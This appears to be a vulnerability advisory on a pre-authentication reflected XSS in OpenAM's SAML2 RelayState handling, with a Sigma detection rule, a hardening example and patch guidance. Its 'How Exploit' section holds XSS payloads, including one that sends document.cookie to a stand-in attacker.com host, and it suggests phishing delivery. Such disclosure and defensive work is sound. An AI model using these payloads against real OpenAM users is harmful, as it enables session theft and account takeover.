The vulnerability arises from a failure to consistently apply output encoding across certain SAML2 federation endpoints when rendering user-supplied parameters into HTML responses. Under a non-default configuration used in clustered deployments, this inconsistency leads to a pre-authentication reflected cross-site scripting (XSS) flaw within the OpenAM origin.
At the core of the issue is the `FSUtils.postToTarget` method, which is responsible for constructing and forwarding HTTP POST requests to target URLs during SAML2 federation flows. In a typical SAML2 cluster setup, OpenAM leverages a “cookie-hash-redirect” mechanism to maintain session stickiness across load-balanced nodes. This mechanism involves hashing a cookie value and embedding it into a redirect URL to ensure that subsequent requests are routed to the correct cluster node.
When a SAML2 request is processed, the `FSUtils.postToTarget` method builds a redirect response that includes user-supplied parameters—such as the `RelayState` or the `Target` URL—directly into the HTML output without proper contextual escaping. While some federation endpoints apply encoding, the SAML2 cluster cookie-hash-redirect path bypasses these safeguards. Specifically, the `postToTarget` method generates an HTML form with hidden input fields whose values are derived from the original request parameters. These values are not sanitized or encoded, allowing an attacker to inject arbitrary JavaScript.
The attack vector is pre-authentication, meaning no valid session is required. An attacker can craft a malicious SAML2 authentication request or a direct HTTP GET/POST to a vulnerable federation endpoint, embedding a payload in a parameter like RelayState. When the OpenAM server processes this request, it constructs a redirect response containing the unsanitized payload. The response is sent back to the user’s browser, where the injected script executes in the context of the OpenAM domain.
This issue is particularly dangerous in clustered environments because the cookie-hash-redirect logic may append the payload to multiple redirect hops, increasing the likelihood of successful exploitation. The lack of output encoding in this specific code path violates secure coding practices (CWE-79) and enables an attacker to steal session cookies, perform unauthorized actions, or defraud users.
The vulnerability affects all OpenAM versions prior to 16.1.1. The fix, implemented in version 16.1.1, introduces proper HTML entity encoding for all user-supplied parameters in the federation redirect path, ensuring that any injected script is neutralized before being rendered.
DailyCVE Form:
Platform: OpenAM (Open Identity Platform)
Version: < 16.1.1
Vulnerability: Pre-authentication Reflected XSS
Severity: Low
Date: Jun 22, 2026
Prediction: Jul 6, 2026
What Undercode Say: Analytics
Affected Endpoints and Parameters
– `/openam/saml2/jsp/…` (various federation JSPs)
– RelayState, Target, `acsUrl` parameters
– `FSUtils.postToTarget` method in `com.sun.identity.saml2.common.FSUtils`
Bash Command to Test for Vulnerability
curl -k "https://openam.example.com/openam/saml2/jsp/spSSOInit.jsp?metaAlias=/sp&RelayState=<script>alert('XSS')</script>" -I
Sample Malicious Request
GET /openam/saml2/jsp/spSSOInit.jsp?metaAlias=/sp&RelayState=%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1
Host: openam.example.com
Code Snippet of Vulnerable Pattern (Simplified)
// FSUtils.postToTarget (vulnerable excerpt, simplified)
public void postToTarget(HttpServletRequest request, HttpServletResponse response,
                         String target, String relayState) throws IOException {
    StringBuilder html = new StringBuilder();
    html.append("<html><body onload=\"document.forms[0].submit()\">");
    // target is placed into the form action attribute without encoding
    html.append("<form method=\"post\" action=\"").append(target).append("\">");
    // relayState is directly concatenated without encoding
    html.append("<input type=\"hidden\" name=\"RelayState\" value=\"").append(relayState).append("\">");
    html.append("</form></body></html>");
    response.getWriter().write(html.toString());
}
Detection Rule (Sigma)
title: OpenAM SAML2 XSS Attempt
logsource:
  category: webserver
detection:
  selection:
    c-uri|contains:
      - 'RelayState=<script'
      - 'RelayState=%3Cscript'
  condition: selection
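The Sigma selection above, run over a handful of web-server log lines, as an added example that is not part of the advisory and not OpenAM or Sigma tooling. The log lines, client addresses and host names are constructed. The first check reproduces the rule's `c-uri|contains` list exactly; the second is a parameter-scoped check that decodes the query string and flags any markup in `RelayState`, which is what the "Monitor Logs" recommendation further down asks for and which the substring rule alone does not cover.

```python
"""Run the advisory's Sigma selection over constructed access-log lines."""
from urllib.parse import parse_qs

# Patterns copied from the advisory's Sigma rule (c-uri|contains).
SIGMA_CONTAINS = ("RelayState=<script", "RelayState=%3Cscript")

# Constructed W3C-style access log lines:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
SAMPLE_LOG = [
    "2026-06-22 10:01:02 203.0.113.5 GET /openam/saml2/jsp/spSSOInit.jsp metaAlias=/sp&RelayState=https://app.example.com/home 302",
    "2026-06-22 10:01:07 203.0.113.9 GET /openam/saml2/jsp/spSSOInit.jsp metaAlias=/sp&RelayState=%3Cscript%3Ealert(1)%3C/script%3E 200",
    "2026-06-22 10:01:09 198.51.100.2 GET /openam/saml2/jsp/spSSOInit.jsp metaAlias=/sp&RelayState=<script>alert(1)</script> 200",
    "2026-06-22 10:01:12 198.51.100.7 GET /openam/saml2/jsp/spSSOInit.jsp metaAlias=/sp&RelayState=%3Cb%3Ehi%3C%2Fb%3E 200",
    "2026-06-22 10:01:15 192.0.2.4 GET /openam/UI/Login goto=https://app.example.com 200",
]


def parse_line(line: str) -> dict:
    """Split one access-log line into the fields the Sigma webserver logsource names."""
    date, time, c_ip, method, stem, query, status = line.split(" ", 6)
    return {
        "timestamp": f"{date} {time}",
        "c-ip": c_ip,
        "cs-method": method,
        "cs-uri-stem": stem,
        "cs-uri-query": query,
        "sc-status": int(status),
        # Sigma's c-uri field is the full request target (path plus query)
        "c-uri": f"{stem}?{query}",
    }


def sigma_selection(event: dict) -> bool:
    """The rule's selection: c-uri contains any of the listed substrings."""
    return any(pattern in event["c-uri"] for pattern in SIGMA_CONTAINS)


def relay_state_has_markup(event: dict) -> bool:
    """Decode the query string and flag a RelayState carrying '<' (any markup, not only <script)."""
    params = parse_qs(event["cs-uri-query"], keep_blank_values=True)
    return any("<" in value for value in params.get("RelayState", []))


def scan(lines):
    """Return (sigma_hits, relay_hits): client IPs matched by each check, in log order."""
    sigma_hits, relay_hits = [], []
    for line in lines:
        event = parse_line(line)
        if sigma_selection(event):
            sigma_hits.append(event["c-ip"])
        if relay_state_has_markup(event):
            relay_hits.append(event["c-ip"])
    return sigma_hits, relay_hits


if __name__ == "__main__":
    sigma, relay = scan(SAMPLE_LOG)
    print("Sigma rule matched:", sigma)
    print("RelayState markup check matched:", relay)
```

The fourth constructed line carries harmless markup that the substring rule misses but the decoded, parameter-scoped check flags; in production the decoded check produces more alerts and should be tuned against the RelayState values your service providers legitimately send (usually plain return URLs).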
How Exploit:
- Identify Target – Locate an OpenAM instance with SAML2 federation enabled and configured in a cluster with cookie-hash-redirect.
- Craft Payload – Create a malicious SAML2 authentication request or directly access a vulnerable endpoint (e.g., spSSOInit.jsp) with a `RelayState` parameter containing JavaScript, e.g., <script>fetch('https://attacker.com/steal?c='+document.cookie)</script>.
- Deliver Attack – Send the crafted URL to a victim via email, phishing, or embed in an iframe.
- Trigger Execution – When the victim clicks the link, the OpenAM server processes the request and returns an HTML form with the unsanitized payload. The browser automatically submits the form, executing the script in the context of the OpenAM domain.
- Exfiltrate Data – The script can steal session cookies, tokens, or perform actions on behalf of the victim.
Protection:
- Upgrade to OpenAM version 16.1.1 or later, which includes proper output encoding for all federation parameters.
- Apply Workaround – For versions prior to 16.1.1, manually configure a Web Application Firewall (WAF) rule to block requests containing suspicious patterns in RelayState, Target, or similar parameters.
- Enable Strict Output Encoding – Ensure that all federation endpoints use `StringEscapeUtils.escapeHtml4()` or equivalent before rendering user input.
- Disable Unused Federation Endpoints – If SAML2 federation is not required, disable or restrict access to the vulnerable JSPs.
- Monitor Logs – Implement logging and alerting for unusual `RelayState` values that contain script tags or encoded HTML.
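The vulnerable pattern from the simplified `FSUtils.postToTarget` excerpt above, set beside the hardened form that the "Enable Strict Output Encoding" item describes, as an added example that is not OpenAM code. It is written in Python so it can be run stand-alone: `html.escape(..., quote=True)` plays the role of `StringEscapeUtils.escapeHtml4()` for values placed in an HTML attribute, and a small `html.parser` based inspector shows what a browser would actually decode from each rendering. The target URL and the RelayState value are constructed (the RelayState value is the advisory's own sample payload).

```python
"""Vulnerable versus hardened rendering of the SAML2 auto-post form."""
import html
from html.parser import HTMLParser


def render_post_form_vulnerable(target: str, relay_state: str) -> str:
    """Concatenate user-supplied values straight into the markup (the flawed pattern)."""
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="post" action="{target}">'
        f'<input type="hidden" name="RelayState" value="{relay_state}">'
        "</form></body></html>"
    )


def render_post_form_hardened(target: str, relay_state: str) -> str:
    """Entity-encode every user-supplied value before it enters an attribute."""
    safe_target = html.escape(target, quote=True)   # '&' -> '&amp;', '"' -> '&quot;', ...
    safe_relay = html.escape(relay_state, quote=True)
    return (
        '<html><body onload="document.forms[0].submit()">'
        f'<form method="post" action="{safe_target}">'
        f'<input type="hidden" name="RelayState" value="{safe_relay}">'
        "</form></body></html>"
    )


class _FormInspector(HTMLParser):
    """Collect the decoded form action and hidden-input values, as a browser would see them."""

    def __init__(self) -> None:
        super().__init__()
        self.action = None
        self.hidden = {}

    def handle_starttag(self, tag, attrs):
        attributes = dict(attrs)  # HTMLParser has already decoded entity references here
        if tag == "form":
            self.action = attributes.get("action")
        elif tag == "input" and attributes.get("type") == "hidden":
            self.hidden[attributes.get("name")] = attributes.get("value")


def inspect_form(markup: str):
    """Parse rendered markup and return (action, {hidden-name: decoded value})."""
    inspector = _FormInspector()
    inspector.feed(markup)
    inspector.close()
    return inspector.action, inspector.hidden


# Constructed inputs: a target URL whose '&' also needs encoding inside an attribute,
# and the advisory's sample payload as the RelayState value.
TARGET = "https://idp.example.com/openam/SSOPOST/metaAlias/idp?a=1&b=2"
PAYLOAD = "<script>alert('XSS')</script>"

if __name__ == "__main__":
    print("vulnerable:", render_post_form_vulnerable(TARGET, PAYLOAD))
    hardened = render_post_form_hardened(TARGET, PAYLOAD)
    print("hardened:  ", hardened)
    print("decoded by the parser:", inspect_form(hardened))
```

The point of the inspector is that encoding loses nothing: the hardened markup contains no raw `<`, `>`, `"`, `'` or `&` from the inputs, yet the parsed hidden-input value and form action are byte-for-byte the original strings, so the relying party still receives the RelayState it expects. In the Java code path the same result comes from wrapping `target` and `relayState` in `StringEscapeUtils.escapeHtml4()` (or another attribute-context encoder) before `append`.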
Impact:
- Confidentiality – An attacker can steal session cookies and impersonate authenticated users, potentially gaining unauthorized access to protected resources.
- Integrity – The attacker can perform actions on behalf of the victim, such as changing account settings or initiating fraudulent transactions.
- Availability – While not directly impacting availability, the XSS can be used to redirect users to malicious sites, leading to phishing or further compromise.
- Attack Complexity – Low; the attack requires only a crafted URL and does not need authentication.
- Privilege Escalation – The vulnerability is pre-authentication, meaning an unauthenticated attacker can target any user who clicks the malicious link, potentially escalating privileges to that user’s level.
Sources:
Reported By: github.com

